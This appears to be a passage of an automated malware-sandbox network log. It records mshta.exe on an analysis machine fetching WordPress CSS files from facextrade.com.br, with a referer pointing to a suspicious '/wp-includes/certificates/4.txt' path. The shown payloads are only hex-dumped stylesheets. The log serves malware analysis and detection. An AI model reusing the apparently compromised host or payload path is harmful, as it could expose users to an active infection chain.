74 61 6e 74 3b 62 6f 74 74 6f 6d 3a 2d 34 30 70 78 20 21 69 6d 70 6f 72 74 61 6e 74 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7a 2d 69 6e 64 65 78 3a 61 75 74 6f 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6d 6f 74 6f 70 72 65 73 73 2d 69 6d 61 67 65 2d 73 6c 69 64 65 72 2d 6f 62 6a 20 2e 66 6c 65 78 2d 63 6f 6e 74 72 6f 6c 2d 6e 61 76 20 6c 69 7b 6d 61 72 67 69 6e 3a 30 20 36 70 78 20 21 69 6d 70 6f 72 74 61 6e 74 3b 70 61 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 61 75 74 6f 20 21 69 6d 70 6f 72 74 61 6e 74
                                        Data Ascii: .motopress-text-obj span{line-height:1em}.motopress-image-obj .motopress-image-obj-basic{max-width:100% !important;margin:0 !important;padding:0 !important;border:0}.motopress-image-slider-obj{line-height:normal;min-height:0}.motopress-image-slider-obj *{line-height:normal}.motopress-image-slider-obj .slides{list-style:none outside none;margin:0 !important;padding:0;line-height:normal}.motopress-image-slider-obj .slides li{margin:0;margin-left:0 !important;padding:0}.motopress-image-slider-obj .slides li:before,.motopress-image-slider-obj .slides li:after{content:none !important}.motopress-image-slider-obj .slides li img{margin:0;padding:0;-moz-box-shadow:none;-webkit-box-shadow:none;box-shadow:none;border:0}.motopress-image-slider-obj .flex-control-nav{position:absolute !important;list-style:none outside none !important;margin:0 !important;padding:0 !important;line-height:normal;right:auto !important;bottom:-40px !important;text-align:center !important;z-index:auto !important}.motopress-image-slider-obj .flex-control-nav li{margin:0 6px !important;padding:0;width:auto !important


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        18192.168.2.2249193187.45.240.6980C:\Windows\System32\mshta.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 16, 2022 10:48:47.931236029 CEST627OUTGET /wp-content/themes/CherryFramework/css/magnific-popup.css?ver=0.9.3 HTTP/1.1
                                        Accept: */*
                                        Referer: http://facextrade.com.br/wp-includes/certificates/4.txt
                                        Accept-Language: en-US
                                        UA-CPU: AMD64
                                        Accept-Encoding: gzip, deflate
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                        Host: facextrade.com.br
                                        Connection: Keep-Alive
                                        Aug 16, 2022 10:48:48.178067923 CEST642INHTTP/1.1 200 OK
                                        Date: Tue, 16 Aug 2022 08:48:48 GMT
                                        Server: Apache
                                        Last-Modified: Tue, 02 Apr 2019 21:29:00 GMT
                                        ETag: "a53043-2458-58592d3483f00"
                                        Accept-Ranges: bytes
                                        Content-Length: 9304
                                        Connection: close
                                        Content-Type: text/css
                                        Aug 16, 2022 10:48:48.178109884 CEST643INData Raw: 2f 2a 20 4d 61 67 6e 69 66 69 63 20 50 6f 70 75 70 20 43 53 53 20 2a 2f 0a 2e 6d 66 70 2d 62 67 20 7b 0a 20 20 74 6f 70 3a 20 30 3b 0a 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 68 65 69 67 68 74 3a 20 31
                                        Data Ascii: /* Magnific Popup CSS */.mfp-bg { top: 0; left: 0; width: 100%; height: 100%; z-index: 1042; overflow: hidden; position: fixed; background: #0b0b0b; opacity: 0.8; filter: alpha(opacity=80); }.mfp-wrap { top: 0; left:
                                        Aug 16, 2022 10:48:48.178148985 CEST645INData Raw: 74 65 6e 74 20 7b 0a 20 20 63 75 72 73 6f 72 3a 20 61 75 74 6f 3b 20 7d 0a 0a 2e 6d 66 70 2d 63 6c 6f 73 65 2c 0a 2e 6d 66 70 2d 61 72 72 6f 77 2c 0a 2e 6d 66 70 2d 70 72 65 6c 6f 61 64 65 72 2c 0a 2e 6d 66 70 2d 63 6f 75 6e 74 65 72 20 7b 0a 20
                                        Data Ascii: tent { cursor: auto; }.mfp-close,.mfp-arrow,.mfp-preloader,.mfp-counter { -webkit-user-select: none; -moz-user-select: none; user-select: none; }.mfp-loading.mfp-figure { display: none; }.mfp-hide { display: none !importan
                                        Aug 16, 2022 10:48:48.178189993 CEST646INData Raw: 73 65 2c 0a 2e 6d 66 70 2d 69 66 72 61 6d 65 2d 68 6f 6c 64 65 72 20 2e 6d 66 70 2d 63 6c 6f 73 65 20 7b 0a 20 20 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 0a 20 20 72 69 67 68 74 3a 20 2d 36 70 78 3b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 72
                                        Data Ascii: se,.mfp-iframe-holder .mfp-close { color: white; right: -6px; text-align: right; padding-right: 6px; width: 100%; }.mfp-counter { position: absolute; top: 0; right: 0; color: #cccccc; font-size: 12px; line-height: 18px
                                        Aug 16, 2022 10:48:48.178227901 CEST647INData Raw: 68 74 20 2e 6d 66 70 2d 61 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 2d 6c 65 66 74 3a 20 31 37 70 78 20 73 6f 6c 69 64 20 77 68 69 74 65 3b 0a 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 33 39 70 78 3b 20 7d 0a 20 20 2e 6d 66 70 2d 61 72 72
                                        Data Ascii: ht .mfp-a { border-left: 17px solid white; margin-left: 39px; } .mfp-arrow-right:before, .mfp-arrow-right .mfp-b { border-left: 27px solid #3f3f3f; }.mfp-iframe-holder { padding-top: 40px; padding-bottom: 40px; }.mfp-if
                                        Aug 16, 2022 10:48:48.178267002 CEST649INData Raw: 61 75 74 6f 3b 20 7d 0a 0a 2e 6d 66 70 2d 74 69 74 6c 65 20 7b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0a 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 38 70 78 3b 0a 20 20 63 6f 6c 6f 72 3a 20 23 66 33 66 33 66 33 3b 0a 20
                                        Data Ascii: auto; }.mfp-title { text-align: left; line-height: 18px; color: #f3f3f3; word-break: break-word; padding-right: 36px; }.mfp-figure small { color: #bdbdbd; display: block; font-size: 12px; line-height: 14px; }.mfp-image-
                                        Aug 16, 2022 10:48:48.178307056 CEST650INData Raw: 63 65 6e 74 65 72 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0a 0a 20 20 2e 6d 66 70 2d 69 6d 67 2d 6d 6f 62 69 6c 65 20 2e 6d 66 70 2d 66 69 67 75 72 65 20 73 6d 61 6c 6c 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69
                                        Data Ascii: center; padding: 0; } .mfp-img-mobile .mfp-figure small { display: inline; margin-left: 5px; } }@media all and (max-width: 900px) { .mfp-arrow { -webkit-transform: scale(0.75); transform: scale(0.75); } .mfp-arrow-
                                        Aug 16, 2022 10:48:48.178345919 CEST652INData Raw: 3b 0a 20 20 74 72 61 6e 73 69 74 69 6f 6e 3a 20 61 6c 6c 20 30 2e 31 35 73 20 65 61 73 65 2d 6f 75 74 3b 0a 7d 0a 2f 2a 20 63 6f 6e 74 65 6e 74 20 61 6e 69 6d 61 74 65 20 69 74 20 2a 2f 0a 2e 6d 66 70 2d 66 61 64 65 2e 6d 66 70 2d 77 72 61 70 2e
                                        Data Ascii: ; transition: all 0.15s ease-out;}/* content animate it */.mfp-fade.mfp-wrap.mfp-ready .mfp-content { opacity: 1;}/* content animate out */.mfp-fade.mfp-wrap.mfp-removing .mfp-content { opacity: 0;}/* ====== Zoom effect ======


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        19192.168.2.2249194187.45.240.6980C:\Windows\System32\mshta.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 16, 2022 10:48:48.415457010 CEST681OUTGET /wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.0.3 HTTP/1.1
                                        Accept: */*
                                        Referer: http://facextrade.com.br/wp-includes/certificates/4.txt
                                        Accept-Language: en-US
                                        UA-CPU: AMD64
                                        Accept-Encoding: gzip, deflate
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                        Host: facextrade.com.br
                                        Connection: Keep-Alive
                                        Aug 16, 2022 10:48:48.644356966 CEST715INHTTP/1.1 200 OK
                                        Date: Tue, 16 Aug 2022 08:48:48 GMT
                                        Server: Apache
                                        Last-Modified: Tue, 02 Apr 2019 21:36:00 GMT
                                        ETag: "a4fbb9-6cf-58592ec50f000"
                                        Accept-Ranges: bytes
                                        Content-Length: 1743
                                        Connection: close
                                        Content-Type: text/css
                                        Data Raw: 64 69 76 2e 77 70 63 66 37 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 7d 0a 0a 64 69 76 2e 77 70 63 66 37 20 2e 73 63 72 65 65 6e 2d 72 65 61 64 65 72 2d 72 65 73 70 6f 6e 73 65 20 7b 0a 09 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 09 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0a 09 63 6c 69 70 3a 20 72 65 63 74 28 31 70 78 2c 20 31 70 78 2c 20 31 70 78 2c 20 31 70 78 29 3b 0a 09 68 65 69 67 68 74 3a 20 31 70 78 3b 0a 09 77 69 64 74 68 3a 20 31 70 78 3b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 6f 72 64 65 72 3a 20 30 3b 0a 7d 0a 0a 64 69 76 2e 77 70 63 66 37 2d 72 65 73 70 6f 6e 73 65 2d 6f 75 74 70 75 74 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 32 65 6d 20 30 2e 35 65 6d 20 31 65 6d 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 2e 32 65 6d 20 31 65 6d 3b 0a 09 62 6f 72 64 65 72 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 66 66 30 30 30 30 3b 0a 7d 0a 0a 64 69 76 2e 77 70 63 66 37 2d 6d 61 69 6c 2d 73 65 6e 74 2d 6f 6b 20 7b 0a 09 62 6f 72 64 65 72 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 33 39 38 66 31 34 3b 0a 7d 0a 0a 64 69 76 2e 77 70 63 66 37 2d 6d 61 69 6c 2d 73 65 6e 74 2d 6e 67 2c 0a 64 69 76 2e 77 70 63 66 37 2d 61 62 6f 72 74 65 64 20 7b 0a 09 62 6f 72 64 65 72 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 66 66 30 30 30 30 3b 0a 7d 0a 0a 64 69 76 2e 77 70 63 66 37 2d 73 70 61 6d 2d 62 6c 6f 63 6b 65 64 20 7b 0a 09 62 6f 72 64 65 72 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 66 66 61 35 30 30 3b 0a 7d 0a 0a 64 69 76 2e 77 70 63 66 37 2d 76 61 6c 69 64 61 74 69 6f 6e 2d 65 72 72 6f 72 73 2c 0a 64 69 76 2e 77 70 63 66 37 2d 61 63 63 65 70 74 61 6e 63 65 2d 6d 69 73 73 69 6e 67 20 7b 0a 09 62 6f 72 64 65 72 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 66 37 65 37 30 30 3b 0a 7d 0a 0a 2e 77 70 63 66 37 2d 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 2d 77 72 61 70 20 7b 0a 09 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 7d 0a 0a 73 70 61 6e 2e 77 70 63 66 37 2d 6e 6f 74 2d 76 61 6c 69 64 2d 74 69 70 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 66 30 30 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 65 6d 3b 0a 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 6e 6f 72 6d 61 6c 3b 0a 09 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 7d 0a 0a 2e 75 73 65 2d 66 6c 6f 61 74 69 6e 67 2d 76 61 6c 69 64 61 74 69 6f 6e 2d 74 69 70 20 73 70 61 6e 2e 77 70 63 66 37 2d 6e 6f 74 2d 76 61 6c 69 64 2d 74 69 70 20 7b 0a 09 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 09 74 6f 70 3a 20 32 30 25 3b 0a 09 6c 65 66 74 3a 20 32 30 25 3b 0a 09 7a 2d 69 6e 64 65 78 3a 20 31 30 30 3b 0a 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 66 66 30 30 30 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 70 61 64 64 69 6e 67 3a 20 2e 32 65 6d 20 2e 38 65 6d 3b 0a 7d 0a 0a 73 70 61 6e 2e 77 70 63 66 37 2d 6c 69 73 74 2d 69 74 65 6d 20 7b 0a 09 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 0a 09 6d 61 72 67 69 6e 3a 20 30 20 30 20 30 20 31 65 6d 3b 0a 7d 0a 0a 73 70 61 6e 2e 77 70 63 66 37 2d 6c 69 73 74 2d 69 74 65 6d 2d 6c 61 62 65 6c 3a 3a 62 65 66 6f 72 65 2c 0a 73 70 61 6e 2e 77 70 63 66 37 2d 6c 69 73 74 2d 69 74 65 6d 2d 6c 61 62 65 6c 3a 3a 61 66 74 65 72 20 7b 0a 09 63 6f 6e 74 65 6e 74 3a 20 22 20 22 3b 0a 7d 0a 0a 2e 77 70 63
                                        Data Ascii: div.wpcf7 {margin: 0;padding: 0;}div.wpcf7 .screen-reader-response {position: absolute;overflow: hidden;clip: rect(1px, 1px, 1px, 1px);height: 1px;width: 1px;margin: 0;padding: 0;border: 0;}div.wpcf7-response-output {margin: 2em 0.5em 1em;padding: 0.2em 1em;border: 2px solid #ff0000;}div.wpcf7-mail-sent-ok {border: 2px solid #398f14;}div.wpcf7-mail-sent-ng,div.wpcf7-aborted {border: 2px solid #ff0000;}div.wpcf7-spam-blocked {border: 2px solid #ffa500;}div.wpcf7-validation-errors,div.wpcf7-acceptance-missing {border: 2px solid #f7e700;}.wpcf7-form-control-wrap {position: relative;}span.wpcf7-not-valid-tip {color: #f00;font-size: 1em;font-weight: normal;display: block;}.use-floating-validation-tip span.wpcf7-not-valid-tip {position: absolute;top: 20%;left: 20%;z-index: 100;border: 1px solid #ff0000;background: #fff;padding: .2em .8em;}span.wpcf7-list-item {display: inline-block;margin: 0 0 0 1em;}span.wpcf7-list-item-label::before,span.wpcf7-list-item-label::after {content: " ";}.wpc
                                        Aug 16, 2022 10:48:48.644381046 CEST716INData Raw: 66 37 2d 64 69 73 70 6c 61 79 2d 6e 6f 6e 65 20 7b 0a 09 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 7d 0a 0a 64 69 76 2e 77 70 63 66 37 20 2e 61 6a 61 78 2d 6c 6f 61 64 65 72 20 7b 0a 09 76 69 73 69 62 69 6c 69 74 79 3a 20 68 69 64 64 65 6e 3b
                                        Data Ascii: f7-display-none {display: none;}div.wpcf7 .ajax-loader {visibility: hidden;display: inline-block;background-image: url('../../images/ajax-loader.gif');width: 16px;height: 16px;border: none;padding: 0;margin: 0 0 0 4px;ve


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        2192.168.2.2249174187.45.240.6980C:\Windows\System32\mshta.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 16, 2022 10:48:41.446990013 CEST36OUTGET /wp-content/themes/theme51253/bootstrap/css/bootstrap.css HTTP/1.1
                                        Accept: */*
                                        Referer: http://facextrade.com.br/wp-includes/certificates/4.txt
                                        Accept-Language: en-US
                                        UA-CPU: AMD64
                                        Accept-Encoding: gzip, deflate
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                        Host: facextrade.com.br
                                        Connection: Keep-Alive
                                        Aug 16, 2022 10:48:41.661566973 CEST108INHTTP/1.1 200 OK
                                        Date: Tue, 16 Aug 2022 08:47:34 GMT
                                        Server: Apache
                                        ETag: "a537ae-1a385-5cd2be5b92824"
                                        Last-Modified: Thu, 30 Sep 2021 00:55:04 GMT
                                        Content-Length: 107397
                                        Content-Type: text/css
                                        Cache-Control: No-Cache
                                        Pragma: no-cache
                                        X-Varnish: 23824850 20835468
                                        Age: 67
                                        Via: 1.1 varnish-v4
                                        Accept-Ranges: bytes
                                        Connection: keep-alive
                                        Data Raw: 61 72 74 69 63 6c 65 2c 20 61 73 69 64 65 2c 20 64 65 74 61 69 6c 73 2c 20 66 69 67 63 61 70 74 69 6f 6e 2c 20 66 69 67 75 72 65 2c 20 66 6f 6f 74 65 72 2c 20 68 65 61 64 65 72 2c 20 68 67 72 6f 75 70 2c 20 6e 61 76 2c 20 73 65 63 74 69 6f 6e 20 7b 20 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 20 7d 0a 61 75 64 69 6f 2c 20 63 61 6e 76 61 73 2c 20 76 69 64 65 6f 20 7b 0a 09 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 0a 09 2a 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 0a 09 2a 7a 6f 6f 6d 3a 31 3b 0a 7d 0a 61 75 64 69 6f 3a 6e 6f 74 28 5b 63 6f 6e 74 72 6f 6c 73 5d 29 20 7b 20 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 20 7d 0a 68 74 6d 6c 20 7b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25 3b 0a 09 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 31 30 30 25 3b 0a 09 2d 6d 73 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 31 30 30 25 3b 0a 7d 0a 61 3a 66 6f 63 75 73 20 7b 0a 09 6f 75 74 6c 69 6e 65 3a 74 68 69 6e 20 64 6f 74 74 65 64 20 23 33 33 33 3b 0a 09 6f 75 74 6c 69 6e 65 3a 35 70 78 20 61 75 74 6f 20 2d 77 65 62 6b 69 74 2d 66 6f 63 75 73 2d 72 69 6e 67 2d 63 6f 6c 6f 72 3b 0a 09 6f 75 74 6c 69 6e 65 2d 6f 66 66 73 65 74 3a 2d 32 70 78 3b 0a 7d 0a 61 3a 68 6f 76 65 72 2c 20 61 3a 61 63 74 69 76 65 20 7b 20 6f 75 74 6c 69 6e 65 3a 30 3b 20 7d 0a 73 75 62 2c 20 73 75 70 20 7b 0a 09 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 37 35 25 3b 0a 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 30 3b 0a 09 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 61 73 65 6c 69 6e 65 3b 0a 7d 0a 73 75 70 20 7b 20 74 6f 70 3a 2d 30 2e 35 65 6d 3b 20 7d 0a 73 75 62 20 7b 20 62 6f 74 74 6f 6d 3a 2d 30 2e 32 35 65 6d 3b 20 7d 0a 69 6d 67 20 7b 0a 09 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 3b 0a 09 77 69 64 74 68 3a 61 75 74 6f 20 5c 39 3b 0a 09 68 65 69 67 68 74 3a 61 75 74 6f 3b 0a 09 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 3b 0a 09 62 6f 72 64 65 72 3a 30 3b 0a 09 2d 6d 73 2d 69 6e 74 65 72 70 6f 6c 61 74 69 6f 6e 2d 6d 6f 64 65 3a 62 69 63 75 62 69 63 3b 0a 7d 0a 23 6d 61 70 5f 63 61 6e 76 61 73 20 69 6d 67 2c 20 2e 67 6f 6f 67 6c 65 2d 6d 61 70 73 20 69 6d 67 20 7b 20 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 20 7d 0a 62 75 74 74 6f 6e 2c 20 69 6e 70 75 74 2c 20 73 65 6c 65 63 74 2c 20 74 65 78 74 61 72 65 61 20 7b 0a 09 6d 61 72 67 69 6e 3a 30 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25 3b 0a 09 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 3b 0a 7d 0a 62 75 74 74 6f 6e 2c 20 69 6e 70 75 74 20 7b 0a 09 2a 6f 76 65 72 66 6c 6f 77 3a 76 69 73 69 62 6c 65 3b 0a 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 0a 7d 0a 62 75 74 74 6f 6e 3a 3a 2d 6d 6f 7a 2d 66 6f 63 75 73 2d 69 6e 6e 65 72 2c 20 69 6e 70 75 74 3a 3a 2d 6d 6f 7a 2d 66 6f 63 75 73 2d 69 6e 6e 65 72 20 7b 0a 09 70 61 64 64 69 6e 67 3a 30 3b 0a 09 62 6f 72 64 65 72 3a 30 3b 0a 7d 0a 62 75 74 74 6f 6e 2c 20 68 74
                                        Data Ascii: article, aside, details, figcaption, figure, footer, header, hgroup, nav, section { display:block; }audio, canvas, video {display:inline-block;*display:inline;*zoom:1;}audio:not([controls]) { display:none; }html {font-size:100%;-webkit-text-size-adjust:100%;-ms-text-size-adjust:100%;}a:focus {outline:thin dotted #333;outline:5px auto -webkit-focus-ring-color;outline-offset:-2px;}a:hover, a:active { outline:0; }sub, sup {position:relative;font-size:75%;line-height:0;vertical-align:baseline;}sup { top:-0.5em; }sub { bottom:-0.25em; }img {max-width:100%;width:auto \9;height:auto;vertical-align:middle;border:0;-ms-interpolation-mode:bicubic;}#map_canvas img, .google-maps img { max-width:none; }button, input, select, textarea {margin:0;font-size:100%;vertical-align:middle;}button, input {*overflow:visible;line-height:normal;}button::-moz-focus-inner, input::-moz-focus-inner {padding:0;border:0;}button, ht
                                        Aug 16, 2022 10:48:41.661634922 CEST109INData Raw: 6d 6c 20 69 6e 70 75 74 5b 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 22 72 65 73 65 74 22 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 22 73 75 62 6d 69 74 22 5d 20 7b 0a 09 2d 77 65 62 6b 69 74 2d 61 70 70 65
                                        Data Ascii: ml input[type="button"], input[type="reset"], input[type="submit"] {-webkit-appearance:button;cursor:pointer;}label, select, button, input[type="button"], input[type="reset"], input[type="submit"], input[type="radio"], input[type="checkb
                                        Aug 16, 2022 10:48:41.661658049 CEST111INData Raw: 74 3a 22 22 3b 0a 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 30 3b 0a 7d 0a 2e 63 6c 65 61 72 66 69 78 3a 61 66 74 65 72 20 7b 20 63 6c 65 61 72 3a 62 6f 74 68 3b 20 7d 0a 2e 68 69 64 65 2d 74 65 78 74 20 7b 0a 09 66 6f 6e 74 3a 30 2f 30 20 61 3b 0a
                                        Data Ascii: t:"";line-height:0;}.clearfix:after { clear:both; }.hide-text {font:0/0 a;color:transparent;text-shadow:none;background-color:transparent;border:0;}.input-block-level {display:block;width:100%;min-height:34px;-webkit-b
                                        Aug 16, 2022 10:48:41.661680937 CEST112INData Raw: 31 31 20 7b 20 77 69 64 74 68 3a 38 36 30 70 78 3b 20 7d 0a 2e 73 70 61 6e 31 30 20 7b 20 77 69 64 74 68 3a 37 38 30 70 78 3b 20 7d 0a 2e 73 70 61 6e 39 20 7b 20 77 69 64 74 68 3a 37 30 30 70 78 3b 20 7d 0a 2e 73 70 61 6e 38 20 7b 20 77 69 64 74
                                        Data Ascii: 11 { width:860px; }.span10 { width:780px; }.span9 { width:700px; }.span8 { width:620px; }.span7 { width:540px; }.span6 { width:460px; }.span5 { width:380px; }.span4 { width:300px; }.span3 { width:220px; }.span2 { width:140px; }.span1
                                        Aug 16, 2022 10:48:41.661703110 CEST113INData Raw: 64 20 2e 73 70 61 6e 31 30 20 7b 0a 09 77 69 64 74 68 3a 38 32 2e 39 37 38 37 32 33 34 30 34 32 35 35 25 3b 0a 09 2a 77 69 64 74 68 3a 38 32 2e 39 32 35 35 33 31 39 31 34 38 39 34 25 3b 0a 7d 0a 2e 72 6f 77 2d 66 6c 75 69 64 20 2e 73 70 61 6e 39
                                        Data Ascii: d .span10 {width:82.978723404255%;*width:82.925531914894%;}.row-fluid .span9 {width:74.468085106383%;*width:74.414893617021%;}.row-fluid .span8 {width:65.957446808511%;*width:65.904255319149%;}.row-fluid .span7 {width:57.44
                                        Aug 16, 2022 10:48:41.661725044 CEST115INData Raw: 37 38 2e 36 31 37 30 32 31 32 37 36 35 39 36 25 3b 0a 7d 0a 2e 72 6f 77 2d 66 6c 75 69 64 20 2e 6f 66 66 73 65 74 39 3a 66 69 72 73 74 2d 63 68 69 6c 64 20 7b 0a 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 37 36 2e 35 39 35 37 34 34 36 38 30 38 35 31
                                        Data Ascii: 78.617021276596%;}.row-fluid .offset9:first-child {margin-left:76.595744680851%;*margin-left:76.489361702128%;}.row-fluid .offset8 {margin-left:70.212765957447%;*margin-left:70.106382978723%;}.row-fluid .offset8:first-child {ma
                                        Aug 16, 2022 10:48:41.661746979 CEST116INData Raw: 74 32 3a 66 69 72 73 74 2d 63 68 69 6c 64 20 7b 0a 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 31 37 2e 30 32 31 32 37 36 35 39 35 37 34 35 25 3b 0a 09 2a 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 31 36 2e 39 31 34 38 39 33 36 31 37 30 32 31 25 3b 0a 7d 0a
                                        Data Ascii: t2:first-child {margin-left:17.021276595745%;*margin-left:16.914893617021%;}.row-fluid .offset1 {margin-left:10.63829787234%;*margin-left:10.531914893617%;}.row-fluid .offset1:first-child {margin-left:8.5106382978723%;*margin-l
                                        Aug 16, 2022 10:48:41.661768913 CEST118INData Raw: 78 74 2d 69 6e 66 6f 3a 66 6f 63 75 73 20 7b 20 63 6f 6c 6f 72 3a 23 32 64 36 39 38 37 3b 20 7d 0a 2e 74 65 78 74 2d 73 75 63 63 65 73 73 20 7b 20 63 6f 6c 6f 72 3a 23 34 36 38 38 34 37 3b 20 7d 0a 61 2e 74 65 78 74 2d 73 75 63 63 65 73 73 3a 68
                                        Data Ascii: xt-info:focus { color:#2d6987; }.text-success { color:#468847; }a.text-success:hover, a.text-success:focus { color:#356635; }.text-left { text-align:left; }.text-right { text-align:right; }.text-center { text-align:center; }h1, h2, h3, h
                                        Aug 16, 2022 10:48:41.661791086 CEST119INData Raw: 6c 64 3b 20 7d 0a 64 64 20 7b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 31 32 70 78 3b 20 7d 0a 2e 64 6c 2d 68 6f 72 69 7a 6f 6e 74 61 6c 20 7b 20 2a 7a 6f 6f 6d 3a 31 3b 20 7d 0a 2e 64 6c 2d 68 6f 72 69 7a 6f 6e 74 61 6c 3a 62 65 66 6f 72 65 2c 20
                                        Data Ascii: ld; }dd { margin-left:12px; }.dl-horizontal { *zoom:1; }.dl-horizontal:before, .dl-horizontal:after {display:table;content:"";line-height:0;}.dl-horizontal:after { clear:both; }.dl-horizontal dt {float:left;width:160px;clear:
                                        Aug 16, 2022 10:48:41.661813974 CEST120INData Raw: 32 34 70 78 3b 0a 09 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 0a 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 34 70 78 3b 0a 7d 0a 63 6f 64 65 2c 20 70 72 65 20 7b 0a 09 70 61 64 64 69 6e 67 3a 30 20 33 70 78 20 32 70 78 3b 0a 09 66 6f
                                        Data Ascii: 24px;font-style:normal;line-height:24px;}code, pre {padding:0 3px 2px;font-family:Monaco, Menlo, Consolas, "Courier New", monospace;font-size:13px;color:#333;-webkit-border-radius:3px;-moz-border-radius:3px;border-radius:3p
                                        Aug 16, 2022 10:48:41.877129078 CEST143INData Raw: 2c 20 74 65 78 74 61 72 65 61 20 7b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 4c 61 74 6f 3b 20 7d 0a 6c 61 62 65 6c 20 7b 0a 09 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 0a 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 35 70 78 3b 0a 7d 0a 73 65 6c
                                        Data Ascii: , textarea { font-family:Lato; }label {display:block;margin-bottom:5px;}select, textarea, input[type="text"], input[type="password"], input[type="datetime"], input[type="datetime-local"], input[type="date"], input[type="month"], input[t
                                        Aug 16, 2022 10:48:42.319031954 CEST259OUTGET /wp-content/plugins/gtranslate/gtranslate-style24.css?ver=4.9.20 HTTP/1.1
                                        Accept: */*
